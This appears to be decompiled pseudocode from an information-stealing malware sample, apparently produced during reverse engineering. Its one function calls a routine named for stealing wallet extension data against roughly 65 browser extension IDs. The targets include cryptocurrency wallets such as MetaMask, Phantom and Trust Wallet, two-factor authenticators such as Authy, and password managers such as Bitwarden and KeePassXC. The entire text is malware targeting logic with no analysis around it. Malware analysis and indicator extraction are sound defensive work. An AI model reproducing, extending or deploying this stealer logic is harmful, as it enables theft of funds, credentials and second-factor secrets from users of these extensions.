// #STR: "pnndplcbkakcplkjnolgbkdgjikjednm", "Tronium", "egjidjbpglichdcondbcbdnbeeppgdph", "Trust Wallet", "aholpfdialjgjfhomihkjbmgjidlcdno", "Exodus Web3 Wallet", "jnlgamecbpmbajjfhmmmlhejkemejdma", "Braavos", "kkpllkodjeloidieedojogacfhpaihoh", "Enkrypt"
void *__userpurge vdr_steal_wallet_extension_data_wrap@<eax>(int a1@<ebx>, int a2, const char *a3, int a5)
{
  vdr_steal_wallet_extension_data(str_ibnejdfjmmkpcnlpebklmnkoeoihofec, a3, a2, str_TronLink, a5, 1, a1, 1, 0, 0);
  vdr_steal_wallet_extension_data(str_nkbihfbeogaeaoehlefnkodbefgpgknn, a3, a2, str_MetaMask, a5, 1, a1, 1, 0, 0);
  vdr_steal_wallet_extension_data(str_fhbohimaelbohpjbbldcngcnapndodjp, a3, a2, str_BinanceChainWallet, a5, 1, a1, 1, 0, 0);
  vdr_steal_wallet_extension_data(str_ffnbelfdoeiohenkjibnmadjiehjhajb, a3, a2, str_Yoroi, a5, 1, a1, 1, 0, 0);
  vdr_steal_wallet_extension_data(str_jbdaocneiiinmjbjlgalhcelgbejmnid, a3, a2, str_NiftyWallet, a5, 1, a1, 1, 0, 0);
  vdr_steal_wallet_extension_data(str_hnfanknocfeofbddgcijnmhnfnkdnaad, a3, a2, str_Coinbase, a5, 1, a1, 1, 0, 1);
  vdr_steal_wallet_extension_data(str_hpglfhgfnhbgpjdenjgmdgoeiappafln, a3, a2, str_Guarda, a5, 1, a1, 1, 0, 1);
  vdr_steal_wallet_extension_data(str_cjelfplplebdjjenllpjcblmjkfcffne, a3, a2, str_JaxxLiberty, a5, 1, a1, 0, 0, 1);
  vdr_steal_wallet_extension_data(str_kncchdigobghenbbaddojjnnaogfppfj, a3, a2, str_iWallet, a5, 1, a1, 1, 0, 0);
  vdr_steal_wallet_extension_data(str_nlbmnnijcnlegkjjpcfjclmcfggfefdm, a3, a2, str_MewCx, a5, 1, a1, 0, 1, 0);
  vdr_steal_wallet_extension_data(str_fnjhmkhhmkbjkkabndcnnogagogbneec, a3, a2, str_RoninWallet, a5, 1, a1, 1, 0, 0);
  vdr_steal_wallet_extension_data(str_cphhlgmgameodnhkjdmkpanlelnlohao, a3, a2, str_NeoLine, a5, 1, a1, 1, 0, 0);
  vdr_steal_wallet_extension_data(str_nhnkbkgjikgcigadomkphalanndcapjk, a3, a2, str_CloverWallet, a5, 1, a1, 1, 0, 0);
  vdr_steal_wallet_extension_data(str_kpfopkelmapcoipemfendmdcghnegimn, a3, a2, str_LiqualityWallet, a5, 1, a1, 1, 0, 0);
  vdr_steal_wallet_extension_data(str_aiifbnbfobpmeekipheeijimdpnlpgpp, a3, a2, str_Terra_Station, a5, 1, a1, 1, 0, 0);
  vdr_steal_wallet_extension_data(str_dmkamcknogkgcdfhhbddcghachkejeap, a3, a2, str_Keplr, a5, 1, a1, 1, 0, 0);
  vdr_steal_wallet_extension_data(str_fhmfendgdocmcbmfikdcogofphimnkno, a3, a2, str_Sollet, a5, 1, a1, 1, 0, 0);
  vdr_steal_wallet_extension_data(str_cnmamaachppnkjgnildpdmkaakejnhae, a3, a2, str_AuroWallet, a5, 1, a1, 1, 0, 0);
  vdr_steal_wallet_extension_data(str_jojhfeoedkpkglbfimdfabpdfjaoolaf, a3, a2, str_PolymeshWallet, a5, 1, a1, 1, 0, 0);
  vdr_steal_wallet_extension_data(str_flpiciilemghbmfalicajoolhkkenfel, a3, a2, str_ICONex, a5, 1, a1, 1, 0, 0);
  vdr_steal_wallet_extension_data(str_aeachknmefphepccionboohckonoeemg, a3, a2, str_Coin98, a5, 1, a1, 1, 0, 0);
  vdr_steal_wallet_extension_data(str_cgeeodpfagjceefieflmdfphplkenlfk, a3, a2, str_EVER_Wallet, a5, 1, a1, 1, 0, 0);
  vdr_steal_wallet_extension_data(str_pdadjkfkgcafgbceimcpbkalnfnepbnk, a3, a2, str_KardiaChain, a5, 1, a1, 1, 0, 0);
  vdr_steal_wallet_extension_data(str_imloifkgjagghnncjkhggdhalmcnfklk, a3, a2, str_Trezor_Password_Manager, a5, 1, a1, 1, 1, 1);
  vdr_steal_wallet_extension_data(str_acmacodkjbdgmoleebolmdjonilkdbch, a3, a2, str_Rabby, a5, 1, a1, 1, 0, 0);
  vdr_steal_wallet_extension_data(str_bfnaelmomeimhlpmgjnjophhpkkoljpa, a3, a2, str_Phantom, a5, 1, a1, 1, 0, 0);
  vdr_steal_wallet_extension_data(str_ejbalbakoplchlghecdalmeeeajnimhm, a3, a2, str_MetaMask, a5, 1, a1, 1, 0, 0);
  vdr_steal_wallet_extension_data(str_odbfpeeihdkbihmopkbjmoonfanlbfcl, a3, a2, str_BraveWallet, a5, 1, a1, 1, 0, 0);
  vdr_steal_wallet_extension_data(str_fhilaheimglignddkjgofkcbgekhenbh, a3, a2, str_Oxygen_Atomic, a5, 1, a1, 1, 0, 0);
  vdr_steal_wallet_extension_data(str_mgffkfbidihjpoaomajlbgchddlicgpn, a3, a2, str_PaliWallet, a5, 1, a1, 1, 0, 0);
  vdr_steal_wallet_extension_data(str_aodkkagnadcbobfpggfnjeongemjbjca, a3, a2, str_BoltX, a5, 1, a1, 0, 0, 1);
  vdr_steal_wallet_extension_data(str_hmeobnfnfcmdkdcmlblgagmfpfboieaf, a3, a2, str_XdefiWallet, a5, 1, a1, 0, 0, 1);
  vdr_steal_wallet_extension_data(str_lpfcbjknijpeeillifnkikgncikgfhdo, a3, a2, str_NamiWallet, a5, 1, a1, 1, 0, 0);
  vdr_steal_wallet_extension_data(str_dngmlblcodfobpdpecaadgfbcggfjfnm, a3, a2, str_MaiarDeFiWallet, a5, 1, a1, 1, 0, 0);
  vdr_steal_wallet_extension_data(str_lpilbniiabackdjcionkobglmddfbcjo, a3, a2, str_WavesKeeper, a5, 1, a1, 1, 0, 0);
  vdr_steal_wallet_extension_data(str_bhhhlbepdkbapadjdnnojkbgioiodbic, a3, a2, str_Solflare, a5, 1, a1, 1, 0, 0);
  vdr_steal_wallet_extension_data(str_dkdedlpgdmmkkfjabffeganieamfklkm, a3, a2, str_CyanoWallet, a5, 1, a1, 1, 0, 0);
  vdr_steal_wallet_extension_data(str_hcflpincpppdclinealmandijcmnkbgn, a3, a2, str_KHC, a5, 1, a1, 1, 0, 0);
  vdr_steal_wallet_extension_data(str_mnfifefkajgofkcjkemidiaecocnkjeh, a3, a2, str_TezBox, a5, 1, a1, 1, 0, 0);
  vdr_steal_wallet_extension_data(str_ookjlbkiijinhpmnjffcofjonbfbgaoc, a3, a2, str_Temple, a5, 1, a1, 1, 0, 0);
  vdr_steal_wallet_extension_data(str_jnkelfanjkeadonecabehalmbgpfodjm, a3, a2, str_Goby, a5, 1, a1, 1, 0, 0);
  vdr_steal_wallet_extension_data(str_kjmoohlgokccodicjjfebfomlbljgfhk, a3, a2, str_RoninWalletEdge, a5, 1, a1, 1, 0, 0);
  vdr_steal_wallet_extension_data(str_bhghoamapcdpbohphigoooaddinpkbai, a3, a2, str_Authenticator, a5, 0, a1, 1, 1, 0);
  vdr_steal_wallet_extension_data(str_gaedmjdfmmahhbjefcbgaolhhanlaolb, a3, a2, str_Authy, a5, 0, a1, 1, 1, 1);
  vdr_steal_wallet_extension_data(str_oeljdldpnmdbchonielidgobddffflal, a3, a2, str_EOS_Authenticator, a5, 0, a1, 1, 1, 1);
  vdr_steal_wallet_extension_data(str_ilgcnhelpchnceeipipijaljkblbcobl, a3, a2, str_GAuth_Authenticator, a5, 0, a1, 1, 1, 1);
  vdr_steal_wallet_extension_data("pnndplcbkakcplkjnolgbkdgjikjednm", a3, a2, "Tronium", a5, 1, a1, 1, 0, 0);
  vdr_steal_wallet_extension_data("egjidjbpglichdcondbcbdnbeeppgdph", a3, a2, "Trust Wallet", a5, 1, a1, 1, 0, 0);
  vdr_steal_wallet_extension_data("aholpfdialjgjfhomihkjbmgjidlcdno", a3, a2, "Exodus Web3 Wallet", a5, 1, a1, 1, 0, 0);
  vdr_steal_wallet_extension_data("jnlgamecbpmbajjfhmmmlhejkemejdma", a3, a2, "Braavos", a5, 1, a1, 1, 0, 0);
  vdr_steal_wallet_extension_data("kkpllkodjeloidieedojogacfhpaihoh", a3, a2, "Enkrypt", a5, 1, a1, 1, 0, 0);
  vdr_steal_wallet_extension_data("mcohilncbfahbmgdjkbpemcciiolgcge", a3, a2, "OKX Web3 Wallet", a5, 1, a1, 1, 0, 0);
  vdr_steal_wallet_extension_data("epapihdplajcdnnkdeiahlgigofloibg", a3, a2, "Sender", a5, 1, a1, 1, 0, 0);
  vdr_steal_wallet_extension_data("gjagmgiddbbciopjhllkdnddhcglnemk", a3, a2, "Hashpack", a5, 1, a1, 1, 0, 0);
  vdr_steal_wallet_extension_data("kmhcihpebfmpgmihbkipmjlmmioameka", a3, a2, "Eternl", a5, 1, a1, 1, 0, 0);
  vdr_steal_wallet_extension_data("bgpipimickeadkjlklgciifhnalhdjhe", a3, a2, "GeroWallet", a5, 1, a1, 1, 0, 0);
  vdr_steal_wallet_extension_data("phkbamefinggmakgklpkljjmgibohnba", a3, a2, "Pontem Wallet", a5, 1, a1, 1, 0, 0);
  vdr_steal_wallet_extension_data("ejjladinnckdgjemekebdpeokbikhfci", a3, a2, "Petra Wallet", a5, 1, a1, 1, 0, 0);
  vdr_steal_wallet_extension_data("efbglgofoippbgcjepnhiblaibcnclgk", a3, a2, "Martian Wallet", a5, 1, a1, 1, 0, 0);
  vdr_steal_wallet_extension_data("cjmkndjhnagcfbpiemnkdpomccnjblmj", a3, a2, "Finnie", a5, 1, a1, 1, 0, 0);
  vdr_steal_wallet_extension_data("aijcbedoijmgnlmjeegjaglmepbmpkpi", a3, a2, "Leap Terra", a5, 1, a1, 1, 0, 0);
  vdr_steal_wallet_extension_data("fiedbfgcleddlbcmgdigjgdfcggjcion", a3, a2, "Microsoft AutoFill", a5, 0, a1, 1, 0, 0);
  vdr_steal_wallet_extension_data("nngceckbapebfimnlniiiahkandclblb", a3, a2, "Bitwarden", a5, 0, a1, 1, 0, 0);
  vdr_steal_wallet_extension_data("fmhmiaejopepamlcjkncpgpdjichnecm", a3, a2, "KeePass Tusk", a5, 0, a1, 1, 0, 0);
  vdr_steal_wallet_extension_data("oboonakemofpalcgghocfoadofidjkkk", a3, a2, "KeePassXC-Browser", a5, 0, a1, 1, 0, 0);
  return vdr_steal_wallet_extension_data("nngceckbapebfimnlniiiahkandclblb", a3, a2, "Bitwarden", a5, 0, a1, 1, 0, 0);
}
